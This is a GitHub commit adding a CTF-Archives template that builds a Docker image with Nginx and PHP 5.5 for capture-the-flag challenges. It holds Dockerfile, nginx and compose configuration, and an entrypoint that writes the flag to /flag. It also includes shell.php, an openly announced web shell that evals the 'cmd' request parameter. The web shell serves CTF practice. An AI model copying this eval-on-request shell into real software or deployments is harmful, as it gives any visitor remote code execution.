-
Notifications
You must be signed in to change notification settings - Fork 30
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
fdb8059
commit 323e3e1
Showing
9 changed files
with
183 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| FROM php:5.5-fpm-alpine | ||
|
|
||
| # 制作者信息 | ||
| LABEL auther_template="CTF-Archives" | ||
|
|
||
| # 安装必要的软件包 | ||
| RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories &&\ | ||
| apk add --update --no-cache nginx bash | ||
|
|
||
| # 拷贝容器入口点脚本 | ||
| COPY ./service/docker-entrypoint.sh /docker-entrypoint.sh | ||
| RUN chmod +x /docker-entrypoint.sh | ||
|
|
||
| # 复制nginx配置文件 | ||
| COPY ./config/nginx.conf /etc/nginx/nginx.conf | ||
|
|
||
| # 复制web项目源码 | ||
| COPY src /var/www/html | ||
|
|
||
| # 重新设置源码路径的用户所有权 | ||
| RUN chown -R www-data:www-data /var/www/html | ||
|
|
||
| # 设置shell的工作目录 | ||
| WORKDIR /var/www/html | ||
|
|
||
| EXPOSE 80 | ||
|
|
||
| # 设置nginx日志保存目录 | ||
| VOLUME ["/var/log/nginx"] | ||
|
|
||
| # 设置容器入口点 | ||
| ENTRYPOINT [ "/docker-entrypoint.sh" ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,30 @@ | ||
| # web-nginx-php55 | ||
|
|
||
| 部分容器逻辑参考自:[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73),在此感谢 [陌竹 - mozhu1024](https://github.com/mozhu1024) 师傅做出的贡献 | ||
|
|
||
| ## 环境说明 | ||
|
|
||
| 提供 `Nginx` +`PHP 5.5.38` 的基础环境,默认暴露端口位于 80 | ||
|
|
||
| > 请注意 !!! | ||
| > | ||
| > 需要注意的是,模板默认会将 flag 保存在 /flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 | ||
| ## 如何使用 | ||
|
|
||
| 直接将 PHP 项目放入 `./src` 目录即可 | ||
|
|
||
| 源码放置进 `./src` 目录之后,执行 | ||
|
|
||
| ```shell | ||
| docker build . | ||
| ``` | ||
|
|
||
| 即可开始编译镜像 | ||
|
|
||
| 也可以在安放好相关项目文件之后,直接使用 `./docker/docker-compose.yml` 内的 `docker-compose` 文件实现一键启动测试容器 | ||
|
|
||
| ```shell | ||
| cd ./docker | ||
| docker-compose up -d | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| # daemon off; | ||
|
|
||
| worker_processes auto; | ||
|
|
||
| events { | ||
| worker_connections 1024; | ||
| } | ||
|
|
||
| http { | ||
| include /etc/nginx/mime.types; | ||
| default_type application/octet-stream; | ||
| sendfile on; | ||
| keepalive_timeout 65; | ||
|
|
||
| server { | ||
| listen 80; | ||
| server_name localhost; | ||
| root /var/www/html; | ||
| index index.php index.html index.htm; | ||
|
|
||
| location / { | ||
| try_files $uri $uri/ /index.php?$args; | ||
| } | ||
|
|
||
| location ~ \.php$ { | ||
| try_files $uri =404; | ||
| fastcgi_pass 127.0.0.1:9000; | ||
| fastcgi_index index.php; | ||
| include fastcgi_params; | ||
| fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; | ||
| } | ||
|
|
||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,11 @@ | ||
| version: '3' | ||
| services: | ||
| test: | ||
| build: ../ | ||
| environment: | ||
| # 仅为测试用flag | ||
| GZCTF_FLAG: "flag{a63b4d37-7681-4850-b6a7-0d7109febb19}" | ||
| ports: | ||
| # 设置了暴露端口 | ||
| - 8080:80 | ||
| restart: unless-stopped |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| #!/bin/sh | ||
|
|
||
| rm -f /docker-entrypoint.sh | ||
|
|
||
| # Configure Nginx | ||
| mkdir mkdir /run/nginx | ||
| touch /run/nginx/nginx.pid | ||
|
|
||
| # Get the user | ||
| user=$(ls /home) | ||
|
|
||
| # Check the environment variables for the flag and assign to INSERT_FLAG | ||
| # 需要注意,以下语句会将FLAG相关传递变量进行覆盖,如果需要,请注意修改相关操作 | ||
| if [ "$DASFLAG" ]; then | ||
| INSERT_FLAG="$DASFLAG" | ||
| export DASFLAG=no_FLAG | ||
| DASFLAG=no_FLAG | ||
| elif [ "$FLAG" ]; then | ||
| INSERT_FLAG="$FLAG" | ||
| export FLAG=no_FLAG | ||
| FLAG=no_FLAG | ||
| elif [ "$GZCTF_FLAG" ]; then | ||
| INSERT_FLAG="$GZCTF_FLAG" | ||
| export GZCTF_FLAG=no_FLAG | ||
| GZCTF_FLAG=no_FLAG | ||
| else | ||
| INSERT_FLAG="flag{TEST_Dynamic_FLAG}" | ||
| fi | ||
|
|
||
| # 将FLAG写入文件 请根据需要修改 | ||
| echo $INSERT_FLAG | tee /flag | ||
|
|
||
| chmod 744 /flag | ||
|
|
||
| php-fpm & nginx & | ||
|
|
||
| echo "Running..." | ||
|
|
||
| tail -F /var/log/nginx/access.log /var/log/nginx/error.log |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| <?php | ||
| $file_path = "/flag"; | ||
| if (file_exists($file_path)) { | ||
| $flag = file_get_contents($file_path); | ||
| } | ||
| else{ | ||
| echo "error"; | ||
| } | ||
| echo $flag; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| <pre> | ||
|
|
||
| ____ _____ _____ _ _ _ | ||
| / ___|_ _| ___| / \ _ __ ___| |__ (_)_ _____ ___ | ||
| | | | | | |_ _____ / _ \ | '__/ __| '_ \| \ \ / / _ \/ __| | ||
| | |___ | | | _|_____/ ___ \| | | (__| | | | |\ V / __/\__ \ | ||
| \____| |_| |_| /_/ \_\_| \___|_| |_|_| \_/ \___||___/ | ||
|
|
||
|
|
||
| </pre> | ||
|
|
||
| <h3> Webshell is in /shell.php ,Key is "cmd"</h3> | ||
| <h3> flag is in /flag.php </h3> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,14 @@ | ||
| <?php | ||
| if(isset($_REQUEST['cmd'])){ | ||
| echo "<pre>"; | ||
| $cmd = ($_REQUEST['cmd']); | ||
| @eval($cmd); | ||
| echo "</pre>"; | ||
| die; | ||
| } | ||
| else{ | ||
| show_source(__FILE__); | ||
| phpinfo(); | ||
| } | ||
|
|
||
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters